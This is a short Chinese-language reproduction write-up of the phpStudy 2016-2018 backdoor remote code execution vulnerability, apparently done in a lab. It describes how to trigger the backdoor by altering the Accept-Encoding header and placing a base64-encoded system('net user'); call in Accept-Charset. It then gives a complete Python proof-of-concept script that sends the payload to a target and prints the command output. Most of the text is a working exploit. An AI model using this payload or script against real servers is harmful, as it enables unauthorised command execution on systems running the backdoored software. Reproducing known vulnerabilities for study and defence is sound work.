漏洞复现
phpstudy使用2016-2018版本,打开burpsuite中自带的浏览器访问phpinfo.php,将数据包发送到repeater模块
漏洞验证
将Accept-Encoding字段中deflate前的空格删掉,如下
Accept-Encoding: gzip,deflate
添加Accept-Charset字段及内容,其中内容为system('命令');并进行base64编码。如下
Accept-Charset: c3lzdGVtKCduZXQgdXNlcicpOw==
poc编写
#phpstudy_2016-2018_backdoor_rce
#简略版,无通用功能,只针对本漏洞
import requests
url="http://192.168.232.182/phpinfo/phpinfo.php"
headers ={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "c3lzdGVtKCduZXQgdXNlcicpOw=="
}
req=requests.get(url=url,headers=headers)
html=req.content.decode("gbk")
offset = html.find("<!DOCTYPE html")
result = html[0:offset]
print(result)